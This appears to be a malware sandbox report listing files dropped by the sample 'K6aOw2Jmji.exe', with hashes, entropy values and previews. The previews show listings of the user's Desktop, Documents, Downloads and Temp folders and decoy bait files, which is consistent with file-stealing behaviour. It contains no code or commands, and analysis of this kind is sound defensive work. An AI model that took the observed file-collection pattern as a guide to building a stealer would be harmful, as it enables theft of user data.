                                                                                                                                                            Preview:URL: Examples of Office product keys - Microsoft Support.Title: https://go.microsoft.com/fwlink/?linkid=851546..URL: Install the English Language Pack for 32-bit Office - Microsoft Support.Title: https://go.microsoft.com/fwlink/?LinkId=2106243.
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):565
                                                                                                                                                            Entropy (8bit):5.246518597239024
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:wvZfWdjKtbb0OL4vsb7ZAEN1cyFJOLAsa6uLKP3BpPR0cqOC0/F5LfL4vssmay:N2Yk405Ac/JkdRPRpPR0TO9NVj40V
                                                                                                                                                            MD5:80134270D9C66F3D76355C8288037B86
                                                                                                                                                            SHA1:05378F1C52C3FF356F5593ACD0BD18618698D5CA
                                                                                                                                                            SHA-256:BC6E82F00CA57B3B30350E71CD704DC9D7843BDCE01F79400F2421EE7C0E9F4A
                                                                                                                                                            SHA-512:95A73DD4A97A96754F01B24C97274807502CA1DA25E2A2D5214E035A9249FC4E14F84B3B5CD1C41CB0AE741556FF2371244336C46266B26AB3CC9102EBFCA9F8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Desktop\...BPMLNOBVSB\...FENIVHOIKN\...NWTVCDUMOB\...UMMBDNEQBN\....HTAGVDFUIE.xlsx....KZWFNRXYKI.png....LTKMYBSEYZ.pdf....UMMBDNEQBN.docx....WUTJSCBCFX.jpg....ZBEDCJPBEY.mp3...VLZDGUKUTZ\....DVWHKMNFNN.png....HTAGVDFUIE.jpg....KATAXZVCPS.pdf....LTKMYBSEYZ.mp3....UMMBDNEQBN.xlsx....VLZDGUKUTZ.docx...WUTJSCBCFX\...desktop.ini...DVWHKMNFNN.png...Excel.lnk...HTAGVDFUIE.jpg...HTAGVDFUIE.xlsx...K6aOw2Jmji.exe...KATAXZVCPS.pdf...KZWFNRXYKI.png...LTKMYBSEYZ.mp3...LTKMYBSEYZ.pdf...UMMBDNEQBN.docx...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...WUTJSCBCFX.jpg...ZBEDCJPBEY.mp3..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):690
                                                                                                                                                            Entropy (8bit):5.337901229995342
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:afwPLKQ4wRLKTLKBLKMkLKBKdjKtbb0OL4vsb7ZAEN1cyFJOLAsa6uLKP3qcqw/F:8xrqEEBK2Yk405Ac/JkdRPaTwNVj40V
                                                                                                                                                            MD5:F6BD14272083AA27E237BDD44429EC9A
                                                                                                                                                            SHA1:E6545AEDA0C3C3C8C21C4362EFFF51741CFE2CF8
                                                                                                                                                            SHA-256:E1B39DA8CFC794F8D9F3CEDA654D45B5AEE3D565F0342B63F44604FF462AE8A1
                                                                                                                                                            SHA-512:9A5096299C6ED3538E27E39C9B52D3B81D0E6A904E7CA450301162DED55ED4FC8B8A1D448FF617F7EB5B000E35C40D22DFB7A5AA205D4B91F174D2DEFED9378B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Documents\...BPMLNOBVSB\...FENIVHOIKN\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NWTVCDUMOB\...UMMBDNEQBN\....HTAGVDFUIE.xlsx....KZWFNRXYKI.png....LTKMYBSEYZ.pdf....UMMBDNEQBN.docx....WUTJSCBCFX.jpg....ZBEDCJPBEY.mp3...VLZDGUKUTZ\....DVWHKMNFNN.png....HTAGVDFUIE.jpg....KATAXZVCPS.pdf....LTKMYBSEYZ.mp3....UMMBDNEQBN.xlsx....VLZDGUKUTZ.docx...WUTJSCBCFX\...desktop.ini...DVWHKMNFNN.png...HTAGVDFUIE.jpg...HTAGVDFUIE.xlsx...KATAXZVCPS.pdf...KZWFNRXYKI.png...LTKMYBSEYZ.mp3...LTKMYBSEYZ.pdf...UMMBDNEQBN.docx...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...WUTJSCBCFX.jpg...ZBEDCJPBEY.mp3..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):234
                                                                                                                                                            Entropy (8bit):5.260211293349667
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:3tSLKIyWyqjgqj0/EsSOLLuhOLXovsWr4rajMmy4k4q:QLKP3qcqw/F5LfL4vssmay
                                                                                                                                                            MD5:D6AEA3299903555A29B3BD5CE14064E3
                                                                                                                                                            SHA1:046A3E39EF0609A04C5E2C6EF96D5B37DF19FA58
                                                                                                                                                            SHA-256:1D512A5E11B4F9EEB96E43336B4BC29CE9D1AB329D11289539FDD2A04C835C25
                                                                                                                                                            SHA-512:29FBA29509E1D41C34512BB892A6DCB8AAB6927A41B8E28151EC8EAE83B2671B71D9F321269C3CBC9AEA8D8CD85F9DDCDA070BB8AB48558F9EC5075B3425A0D4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Downloads\...desktop.ini...DVWHKMNFNN.png...HTAGVDFUIE.jpg...HTAGVDFUIE.xlsx...KATAXZVCPS.pdf...KZWFNRXYKI.png...LTKMYBSEYZ.mp3...LTKMYBSEYZ.pdf...UMMBDNEQBN.docx...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...WUTJSCBCFX.jpg...ZBEDCJPBEY.mp3..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):25
                                                                                                                                                            Entropy (8bit):4.023465189601646
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1hiR8LKB:14R8LKB
                                                                                                                                                            MD5:966247EB3EE749E21597D73C4176BD52
                                                                                                                                                            SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                                                                                                            SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                                                                                                            SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:OneDrive\...desktop.ini..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):88
                                                                                                                                                            Entropy (8bit):4.450045114302317
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                                                                                                            MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                                                                                                            SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                                                                                                            SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                                                                                                            SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):24
                                                                                                                                                            Entropy (8bit):4.053508854797679
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:jgBLKB:j4LKB
                                                                                                                                                            MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                                                                                                            SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                                                                                                            SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                                                                                                            SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Startup\...desktop.ini..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4152
                                                                                                                                                            Entropy (8bit):5.307295507027113
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:4jzcRPTmt6qESf2qNebQX3LHYwrbIGVEyKTZnrj4wq:BtbS+q4cnzDUKINq
                                                                                                                                                            MD5:D6CC29CA4D82B618CC72EEAAF4568A67
                                                                                                                                                            SHA1:E3CF64B6963E36FD24074BDD3FB8F06D47FBA319
                                                                                                                                                            SHA-256:FE4F5188CC754EE457459EC019378A0690F40731902B5B98071D2B48C848C76E
                                                                                                                                                            SHA-512:5CEF3B5081BD731136F762B4B680418BFE16A517D0FB2E73637353F6787C64D2FA6579767F13AF5D519CCEAE987F50EF767AE648992D2D95AD3581F383032D31
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):23
                                                                                                                                                            Entropy (8bit):3.7950885863977324
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:k+JrLKB:k+JrLKB
                                                                                                                                                            MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                                                                                                            SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                                                                                                            SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                                                                                                            SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Videos\...desktop.ini..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694985340190863
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                            MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                            SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                            SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                            SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                            Encrypted:false
